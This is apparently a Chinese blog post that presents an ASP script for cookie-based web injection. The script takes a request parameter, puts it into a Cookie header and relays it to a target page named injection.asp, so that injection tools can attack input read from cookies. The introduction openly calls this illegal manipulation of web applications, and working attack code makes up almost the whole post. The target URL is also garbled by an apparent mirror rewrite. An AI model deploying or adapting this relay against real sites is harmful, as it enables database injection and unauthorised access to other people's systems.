本文展示了一段使用ASP进行Web注入攻击的示例代码。通过构造特定字符串并发送到目标URL,可以实现对Web应用程序的非法操作。文章详细介绍了如何使用MSXML2组件创建HTTP请求,并设置必要的请求头来模拟客户端行为。
<%
Str="xxxid="&escape(request("FK"))
Url="http://xxx.chinaxxx.com/injection.asp"
response.write PostData(Url,Str)
Function PostData(PostUrl,PostCok)
Dim Http
Set Http = Server.CreateObject("msxml2.serverXMLHTTP")
With Http
.Open "GET",PostUrl,False
.SetRequestHeader "Cookie",PostCok
.Send
PostData = .ResponseBody
End With
Set Http = Nothing
PostData =bytes2BSTR(PostData)
End Function
Function bytes2BSTR(vIn)
Dim strReturn
Dim I, ThisCharCode, NextCharCode
strReturn = ""
For I = 1 To LenB(vIn)
ThisCharCode = AscB(MidB(vIn, I, 1))
If ThisCharCode < &H80 Then
strReturn = strReturn & Chr(ThisCharCode)
Else
NextCharCode = AscB(MidB(vIn, I + 1, 1))
strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode))
I = I + 1
End If
Next
bytes2BSTR = strReturn
End Function
%>
扫一扫
9940
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
